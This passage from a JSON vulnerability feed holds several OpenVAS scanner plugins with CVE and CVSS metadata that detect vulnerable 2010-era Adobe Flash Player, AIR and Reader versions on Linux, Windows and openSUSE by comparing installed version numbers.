: \"http://www.vupen.com/english/advisories/2010/1349\");\n script_xref(name : \"URL\" , value : \"http://www.vupen.com/english/advisories/2010/1348\");\n script_xref(name : \"URL\" , value : \"http://www.adobe.com/support/security/advisories/apsa10-01.html\");\n\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2010 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_adobe_prdts_detect_lin.nasl\", \"gb_adobe_flash_player_detect_lin.nasl\");\n script_mandatory_keys(\"Adobe/Air_or_Flash_or_Reader/Linux/Installed\");\n script_tag(name : \"impact\" , value : tag_impact);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name : \"solution\" , value : tag_solution);\n exit(0);\n}\n\n\ninclude(\"version_func.inc\");\n\n# Check for Adobe Flash Player\npVer = get_kb_item(\"AdobeFlashPlayer/Linux/Ver\");\nif(pVer != NULL)\n{\n # Adobe Flash Player version 9.0.0 to 9.0.262 and 10.x to 10.0.45.2\n if(version_in_range(version:pVer, test_version:\"9.0.0\", test_version2:\"9.0.262\") ||\n version_in_range(version:pVer, test_version:\"10.0\", test_version2:\"10.0.45.2\"))\n {\n security_message(0);\n exit(0);\n }\n}\n\n# Adobe Reader\narVer = get_kb_item(\"Adobe/Reader/Linux/Version\");\nif(arVer != NULL)\n{\n # Grep for Adobe Reader version 9.0 to 9.3.2\n if(version_in_range(version:arVer, test_version:\"9.0\", test_version2:\"9.3.2\")){\n security_message(0);\n }\n}\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-01-06T13:05:11", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-1295", "CVE-2010-2211", "CVE-2010-2201", "CVE-2010-2212", "CVE-2010-2209", "CVE-2010-2207", "CVE-2010-2203", "CVE-2010-2210", "CVE-2010-2202", "CVE-2010-2205", "CVE-2010-2204", 
"CVE-2010-1285", "CVE-2010-2206", "CVE-2010-1297", "CVE-2010-1240", "CVE-2010-2208", "CVE-2010-2168"], "description": "Check for the Version of acroread", "modified": "2018-01-04T00:00:00", "published": "2010-07-12T00:00:00", "id": "OPENVAS:1361412562310850135", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310850135", "type": "openvas", "title": "SuSE Update for acroread SUSE-SA:2010:029", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# SuSE Update for acroread SUSE-SA:2010:029\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Acrobat Reader was updated to version 9.3.3 to fix lots of security\n issues and bugs, several of whom could be used to execute code by\n trick the target user to open specially crafted PDFs.\n\n Adobes advisory can be found here:\n http://www.adobe.com/support/security/bulletins/apsb10-15.html\";\ntag_solution = \"Please Install the Updated Packages.\";\n\ntag_impact = \"remote code execution\";\ntag_affected = \"acroread on openSUSE 11.0, openSUSE 11.1, openSUSE 11.2\";\n\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.850135\");\n script_version(\"$Revision: 8287 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-04 08:28:11 +0100 (Thu, 04 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2010-07-12 11:56:20 +0200 (Mon, 12 Jul 2010)\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"SUSE-SA\", value: \"2010-029\");\n script_cve_id(\"CVE-2010-1240\", \"CVE-2010-1285\", \"CVE-2010-1295\", \"CVE-2010-1297\", \"CVE-2010-2168\", \"CVE-2010-2201\", \"CVE-2010-2202\", \"CVE-2010-2203\", \"CVE-2010-2204\", \"CVE-2010-2205\", \"CVE-2010-2206\", \"CVE-2010-2207\", \"CVE-2010-2208\", \"CVE-2010-2209\", \"CVE-2010-2210\", \"CVE-2010-2211\", \"CVE-2010-2212\");\n script_name(\"SuSE Update for acroread SUSE-SA:2010:029\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of acroread\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2010 Greenbone Networks GmbH\");\n script_family(\"SuSE Local 
Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\");\n script_tag(name : \"impact\" , value : tag_impact);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"openSUSE11.0\")\n{\n\n if ((res = isrpmvuln(pkg:\"acroread\", rpm:\"acroread~9.3.3~2.1\", rls:\"openSUSE11.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"openSUSE11.1\")\n{\n\n if ((res = isrpmvuln(pkg:\"acroread\", rpm:\"acroread~9.3.3~2.1.1\", rls:\"openSUSE11.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"openSUSE11.2\")\n{\n\n if ((res = isrpmvuln(pkg:\"acroread\", rpm:\"acroread~9.3.3~2.1.1\", rls:\"openSUSE11.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-12-15T11:58:11", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-1295", "CVE-2010-2211", "CVE-2010-2201", "CVE-2010-2212", "CVE-2010-2209", "CVE-2010-2207", "CVE-2010-2203", "CVE-2010-2210", "CVE-2010-2202", "CVE-2010-2205", "CVE-2010-2204", "CVE-2010-1285", "CVE-2010-2206", "CVE-2010-1297", "CVE-2010-1240", "CVE-2010-2208", "CVE-2010-2168"], "description": "Check for the Version of acroread", "modified": "2017-12-15T00:00:00", "published": "2010-07-12T00:00:00", "id": 
"OPENVAS:850135", "href": "http://plugins.openvas.org/nasl.php?oid=850135", "type": "openvas", "title": "SuSE Update for acroread SUSE-SA:2010:029", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# SuSE Update for acroread SUSE-SA:2010:029\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Acrobat Reader was updated to version 9.3.3 to fix lots of security\n issues and bugs, several of whom could be used to execute code by\n trick the target user to open specially crafted PDFs.\n\n Adobes advisory can be found here:\n http://www.adobe.com/support/security/bulletins/apsb10-15.html\";\ntag_solution = \"Please Install the Updated Packages.\";\n\ntag_impact = \"remote code execution\";\ntag_affected = \"acroread on openSUSE 11.0, openSUSE 11.1, openSUSE 11.2\";\n\n\nif(description)\n{\n script_id(850135);\n script_version(\"$Revision: 8130 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-15 07:31:09 +0100 (Fri, 15 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2010-07-12 11:56:20 +0200 
(Mon, 12 Jul 2010)\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"SUSE-SA\", value: \"2010-029\");\n script_cve_id(\"CVE-2010-1240\", \"CVE-2010-1285\", \"CVE-2010-1295\", \"CVE-2010-1297\", \"CVE-2010-2168\", \"CVE-2010-2201\", \"CVE-2010-2202\", \"CVE-2010-2203\", \"CVE-2010-2204\", \"CVE-2010-2205\", \"CVE-2010-2206\", \"CVE-2010-2207\", \"CVE-2010-2208\", \"CVE-2010-2209\", \"CVE-2010-2210\", \"CVE-2010-2211\", \"CVE-2010-2212\");\n script_name(\"SuSE Update for acroread SUSE-SA:2010:029\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of acroread\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2010 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\");\n script_tag(name : \"impact\" , value : tag_impact);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"openSUSE11.0\")\n{\n\n if ((res = isrpmvuln(pkg:\"acroread\", rpm:\"acroread~9.3.3~2.1\", rls:\"openSUSE11.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"openSUSE11.1\")\n{\n\n if ((res = isrpmvuln(pkg:\"acroread\", rpm:\"acroread~9.3.3~2.1.1\", rls:\"openSUSE11.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == 
\"openSUSE11.2\")\n{\n\n if ((res = isrpmvuln(pkg:\"acroread\", rpm:\"acroread~9.3.3~2.1.1\", rls:\"openSUSE11.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2020-06-02T15:55:15", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-4546", "CVE-2010-2160", "CVE-2010-2161", "CVE-2010-2176", "CVE-2010-2177", "CVE-2010-2186", "CVE-2010-2174", "CVE-2010-2166", "CVE-2010-2173", "CVE-2010-2188", "CVE-2010-2165", "CVE-2010-2170", "CVE-2010-2171", "CVE-2010-2184", "CVE-2010-2182", "CVE-2010-2181", "CVE-2010-2163", "CVE-2010-2183", "CVE-2010-2169", "CVE-2010-1297", "CVE-2010-2179", "CVE-2010-2189", "CVE-2010-2185", "CVE-2010-2164", "CVE-2009-3793", "CVE-2010-2167", "CVE-2010-2162", "CVE-2010-2175", "CVE-2010-2180", "CVE-2010-2187", "CVE-2010-2178"], "description": "This host is installed with Adobe Flash Player/Air and is prone to\n multiple vulnerabilities.", "modified": "2020-05-28T00:00:00", "published": "2010-06-22T00:00:00", "id": "OPENVAS:1361412562310902200", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310902200", "type": "openvas", "title": "Adobe Flash Player/Air Multiple Vulnerabilities - June10 (Windows)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Adobe Flash Player/Air Multiple Vulnerabilities - June10 (Windows)\n#\n# Authors:\n# Antu Sanadi <santu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2010 SecPod, http://www.secpod.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied 
warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.902200\");\n script_version(\"2020-05-28T14:41:23+0000\");\n script_tag(name:\"last_modification\", value:\"2020-05-28 14:41:23 +0000 (Thu, 28 May 2020)\");\n script_tag(name:\"creation_date\", value:\"2010-06-22 13:34:32 +0200 (Tue, 22 Jun 2010)\");\n script_cve_id(\"CVE-2008-4546\", \"CVE-2009-3793\", \"CVE-2010-1297\", \"CVE-2010-2160\",\n \"CVE-2010-2161\", \"CVE-2010-2162\", \"CVE-2010-2163\", \"CVE-2010-2164\",\n \"CVE-2010-2165\", \"CVE-2010-2166\", \"CVE-2010-2167\", \"CVE-2010-2169\",\n \"CVE-2010-2170\", \"CVE-2010-2171\", \"CVE-2010-2173\", \"CVE-2010-2174\",\n \"CVE-2010-2175\", \"CVE-2010-2176\", \"CVE-2010-2177\", \"CVE-2010-2178\",\n \"CVE-2010-2179\", \"CVE-2010-2180\", \"CVE-2010-2181\", \"CVE-2010-2182\",\n \"CVE-2010-2183\", \"CVE-2010-2184\", \"CVE-2010-2185\", \"CVE-2010-2186\",\n \"CVE-2010-2187\", \"CVE-2010-2188\", \"CVE-2010-2189\");\n script_bugtraq_id(40759);\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_name(\"Adobe Flash Player/Air Multiple Vulnerabilities - June10 (Windows)\");\n script_xref(name:\"URL\", value:\"http://www.vupen.com/english/advisories/2010/1421\");\n script_xref(name:\"URL\", value:\"http://securitytracker.com/alerts/2010/Jun/1024086.html\");\n script_xref(name:\"URL\", value:\"http://www.adobe.com/support/security/bulletins/apsb10-14.html\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2010 SecPod\");\n script_family(\"General\");\n 
script_dependencies(\"gb_adobe_flash_player_detect_win.nasl\");\n script_mandatory_keys(\"Adobe/Air_or_Flash_or_Reader_or_Acrobat/Win/Installed\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow attackers to obtain sensitive\n information or cause a denial of service.\");\n\n script_tag(name:\"affected\", value:\"Adobe AIR version prior to 2.0.2.12610,\n\n Adobe Flash Player before 9.0.277.0 and 10.x before 10.1.53.64 on Windows.\");\n\n script_tag(name:\"insight\", value:\"The flaws are due to input validation errors, memory corruptions,\n array indexing, use-after-free, integer and buffer overflows, and\n invalid pointers when processing malformed Flash content.\");\n\n script_tag(name:\"solution\", value:\"Update to Adobe Air 2.0.2.12610 or Adobe Flash Player 9.0.277.0 or 10.0.45.2.\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Adobe Flash Player/Air and is prone to\n multiple vulnerabilities.\");\n\n script_tag(name:\"qod_type\", value:\"registry\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\ncpe_list = make_list(\"cpe:/a:adobe:flash_player\",\n \"cpe:/a:adobe:adobe_air\");\n\nif(!infos = get_app_version_and_location_from_list(cpe_list:cpe_list, exit_no_version:TRUE))\n exit(0);\n\nvers = infos[\"version\"];\npath = infos[\"location\"];\ncpe = infos[\"cpe\"];\n\nif(cpe == \"cpe:/a:adobe:flash_player\") {\n if(version_is_less(version:vers, test_version:\"9.0.277.0\") ||\n version_in_range(version:vers, test_version:\"10.0\", test_version2:\"10.0.45.1\")) {\n report = report_fixed_ver(installed_version:vers, fixed_version:\"9.0.277.0/10.0.45.2\", install_path:path);\n security_message(port:0, data:report);\n exit(0);\n }\n} else if(cpe == \"cpe:/a:adobe:adobe_air\") {\n if(version_is_less(version:vers, test_version:\"2.0.2.12610\")) {\n report = report_fixed_ver(installed_version:vers, 
fixed_version:\"2.0.2.12610\", install_path:path);\n security_message(port:0, data:report);\n exit(0);\n }\n}\n\nexit(99);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2018-01-02T10:54:33", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-4546", "CVE-2010-2160", "CVE-2010-2161", "CVE-2010-2176", "CVE-2010-2177", "CVE-2010-2186", "CVE-2010-2174", "CVE-2010-2166", "CVE-2010-2173", "CVE-2010-2188", "CVE-2010-2165", "CVE-2010-2170", "CVE-2010-2171", "CVE-2010-2184", "CVE-2010-2182", "CVE-2010-2181", "CVE-2010-2163", "CVE-2010-2183", "CVE-2010-2169", "CVE-2010-1297", "CVE-2010-2179", "CVE-2010-2189", "CVE-2010-2185", "CVE-2010-2164", "CVE-2009-3793", "CVE-2010-2167", "CVE-2010-2162", "CVE-2010-2175", "CVE-2010-2180", "CVE-2010-2187", "CVE-2010-2178"], "description": "This host is installed with Adobe Flash Player/Air and is prone to\n multiple vulnerabilities.", "modified": "2017-12-21T00:00:00", "published": "2010-06-22T00:00:00", "id": "OPENVAS:902200", "href": "http://plugins.openvas.org/nasl.php?oid=902200", "type": "openvas", "title": "Adobe Flash Player/Air Multiple Vulnerabilities - June10 (Windows)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: secpod_adobe_prdts_mult_vuln_jun10_win.nasl 8210 2017-12-21 10:26:31Z cfischer $\n#\n# Adobe Flash Player/Air Multiple Vulnerabilities - June10 (Windows)\n#\n# Authors:\n# Antu Sanadi <santu@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2010 SecPod, http://www.secpod.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_impact = \"Successful exploitation will allow attackers to obtain sensitive\n information or cause a denial of service.\n\n Impact Level: Application/System.\";\ntag_affected = \"Adobe AIR version prior to 2.0.2.12610,\n\n Adobe Flash Player before 9.0.277.0 and 10.x before 10.1.53.64 on windows.\";\n\ntag_insight = \"The flaws are due to input validation errors, memory corruptions,\n array indexing, use-after-free, integer and buffer overflows, and\n invalid pointers when processing malformed Flash content.\";\n\ntag_solution = \"Update to Adobe Air2.0.2.12610 or Adobe Flash Player 9.0.277.0 or 10.0.45.2,\n http://get.adobe.com/air\n http://www.adobe.com/support/flashplayer/downloads.html\";\n\ntag_summary = \"This host is installed with Adobe Flash Player/Air and is prone to\n multiple vulnerabilities.\";\n\nif(description)\n{\n script_id(902200);\n script_version(\"$Revision: 8210 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-21 11:26:31 +0100 (Thu, 21 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2010-06-22 13:34:32 +0200 (Tue, 22 Jun 2010)\");\n script_cve_id(\"CVE-2008-4546\", \"CVE-2009-3793\", \"CVE-2010-1297\", \"CVE-2010-2160\",\n \"CVE-2010-2161\", \"CVE-2010-2162\", \"CVE-2010-2163\", \"CVE-2010-2164\",\n \"CVE-2010-2165\", \"CVE-2010-2166\", \"CVE-2010-2167\", \"CVE-2010-2169\",\n \"CVE-2010-2170\", \"CVE-2010-2171\", \"CVE-2010-2173\", \"CVE-2010-2174\",\n \"CVE-2010-2175\", \"CVE-2010-2176\", \"CVE-2010-2177\", \"CVE-2010-2178\",\n \"CVE-2010-2179\", \"CVE-2010-2180\", \"CVE-2010-2181\", \"CVE-2010-2182\",\n \"CVE-2010-2183\", \"CVE-2010-2184\", 
\"CVE-2010-2185\", \"CVE-2010-2186\",\n \"CVE-2010-2187\", \"CVE-2010-2188\", \"CVE-2010-2189\");\n script_bugtraq_id(40759);\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_name(\"Adobe Flash Player/Air Multiple Vulnerabilities - June10 (Windows)\");\n script_xref(name : \"URL\" , value : \"http://www.vupen.com/english/advisories/2010/1421\");\n script_xref(name : \"URL\" , value : \"http://securitytracker.com/alerts/2010/Jun/1024086.html\");\n script_xref(name : \"URL\" , value : \"http://www.adobe.com/support/security/bulletins/apsb10-14.html\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2010 SecPOd\");\n script_family(\"General\");\n script_dependencies(\"gb_adobe_flash_player_detect_win.nasl\");\n script_mandatory_keys(\"Adobe/Air_or_Flash_or_Reader_or_Acrobat/Win/Installed\");\n script_tag(name : \"impact\" , value : tag_impact);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"registry\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nCPE = \"cpe:/a:adobe:flash_player\";\nif(playerVer = get_app_version(cpe:CPE, nofork:TRUE))\n{\n # Grep for version 10.x < 10.0.45.2, less than 9.0.277.0\n if(version_is_less(version:playerVer, test_version:\"9.0.277.0\") ||\n version_in_range(version:playerVer, test_version:\"10.0\", test_version2:\"10.0.45.1\"))\n {\n security_message(0);\n exit(0);\n }\n}\n\nCPE = \"cpe:/a:adobe:adobe_air\";\nif(airVer = get_app_version(cpe:CPE))\n{\n # Grep for version < 2.0.2.12610\n if(version_is_less(version:airVer, test_version:\"2.0.2.12610\")){\n security_message(0);\n }\n}\n", "cvss": {"score": 9.3, 
"vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-14T10:49:16", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-4546", "CVE-2010-2160", "CVE-2010-2161", "CVE-2010-2176", "CVE-2010-2177", "CVE-2010-2186", "CVE-2010-2174", "CVE-2010-2166", "CVE-2010-2173", "CVE-2010-2188", "CVE-2010-2165", "CVE-2010-2170", "CVE-2010-2171", "CVE-2010-2184", "CVE-2010-2182", "CVE-2010-2181", "CVE-2010-2163", "CVE-2010-2183", "CVE-2010-2169", "CVE-2010-1297", "CVE-2010-2179", "CVE-2010-2172", "CVE-2010-2189", "CVE-2010-2185", "CVE-2010-2164", "CVE-2009-3793", "CVE-2010-2167", "CVE-2010-2162", "CVE-2010-2175", "CVE-2010-2180", "CVE-2010-2187", "CVE-2010-2178"], "description": "This host is installed with Adobe Flash Player/Air and is prone to\n multiple vulnerabilities.", "modified": "2017-06-29T00:00:00", "published": "2010-06-22T00:00:00", "id": "OPENVAS:902194", "href": "http://plugins.openvas.org/nasl.php?oid=902194", "type": "openvas", "title": "Adobe Flash Player/Air Multiple Vulnerabilities - June10 (Linux)", "sourceData": "##############################################################################\n# OpenVAS Vulnerability Test\n# $Id: secpod_adobe_prdts_mult_vuln_jun10_lin.nasl 6476 2017-06-29 07:32:00Z cfischer $\n#\n# Adobe Flash Player/Air Multiple Vulnerabilities - June10 (Linux)\n#\n# Authors:\n# Antu Sanadi <santu@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2010 SecPod, http://www.secpod.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_impact = \"Successful exploitation will allow remote attackers to obtain sensitive\n information or cause a denial of service.\n Impact Level: Application/System.\";\ntag_affected = \"Adobe AIR version prior to 2.0.2.12610,\n Adobe Flash Player before 9.0.277.0 and 10.x before 10.1.53.64 on Linux.\";\ntag_insight = \"The flaws are due to input validation errors, memory corruptions,\n array indexing, use-after-free, integer and buffer overflows, and\n invalid pointers when processing malformed Flash content.\";\ntag_solution = \"Update to Adobe Air2.0.2.12610 or Adobe Flash Player 9.0.277.0 or 10.0.45.2,\n http://get.adobe.com/air\n http://www.adobe.com/support/flashplayer/downloads.html\";\ntag_summary = \"This host is installed with Adobe Flash Player/Air and is prone to\n multiple vulnerabilities.\";\n\nif(description)\n{\n script_id(902194);\n script_version(\"$Revision: 6476 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-06-29 09:32:00 +0200 (Thu, 29 Jun 2017) $\");\n script_tag(name:\"creation_date\", value:\"2010-06-22 13:34:32 +0200 (Tue, 22 Jun 2010)\");\n script_cve_id(\"CVE-2008-4546\", \"CVE-2009-3793\", \"CVE-2010-1297\", \"CVE-2010-2160\",\n \"CVE-2010-2161\", \"CVE-2010-2162\", \"CVE-2010-2163\", \"CVE-2010-2164\",\n \"CVE-2010-2165\", \"CVE-2010-2166\", \"CVE-2010-2167\", \"CVE-2010-2169\",\n \"CVE-2010-2170\", \"CVE-2010-2171\", \"CVE-2010-2172\", \"CVE-2010-2173\",\n \"CVE-2010-2174\", \"CVE-2010-2175\", \"CVE-2010-2176\", \"CVE-2010-2177\",\n \"CVE-2010-2178\", \"CVE-2010-2179\", \"CVE-2010-2180\", \"CVE-2010-2181\",\n \"CVE-2010-2182\", \"CVE-2010-2183\", \"CVE-2010-2184\", 
\"CVE-2010-2185\",\n \"CVE-2010-2186\", \"CVE-2010-2187\", \"CVE-2010-2188\", \"CVE-2010-2189\");\n script_bugtraq_id(40759);\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_name(\"Adobe Flash Player/Air Multiple Vulnerabilities - June10 (Linux)\");\n script_xref(name : \"URL\" , value : \"http://www.vupen.com/english/advisories/2010/1421\");\n script_xref(name : \"URL\" , value : \"http://securitytracker.com/alerts/2010/Jun/1024086.html\");\n script_xref(name : \"URL\" , value : \"http://www.adobe.com/support/security/bulletins/apsb10-14.html\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2010 SecPOd\");\n script_family(\"General\");\n script_dependencies(\"gb_adobe_flash_player_detect_lin.nasl\");\n script_mandatory_keys(\"Adobe/Air_or_Flash_or_Reader/Linux/Installed\");\n script_tag(name : \"impact\" , value : tag_impact);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"version_func.inc\");\n\n# Check for Adobe Flash Player\nplayerVer = get_kb_item(\"AdobeFlashPlayer/Linux/Ver\");\nif(playerVer != NULL)\n{\n # Grep for version 10.x < 10.0.45.2, less than 9.0.277.0\n if(version_is_less(version:playerVer, test_version:\"9.0.277.0\") ||\n version_in_range(version:playerVer, test_version:\"10.0\", test_version2:\"10.0.45.1\"))\n {\n security_message(0);\n exit(0);\n }\n}\n\n# Check for Adobe Air\nairVer = get_kb_item(\"Adobe/Air/Linux/Ver\");\nif(airVer != NULL)\n{\n # Grep for version < 2.0.2.12610\n if(version_is_less(version:airVer, test_version:\"2.0.2.12610\")){\n security_message(0);\n }\n}\n", "cvss": {"score": 9.3, 
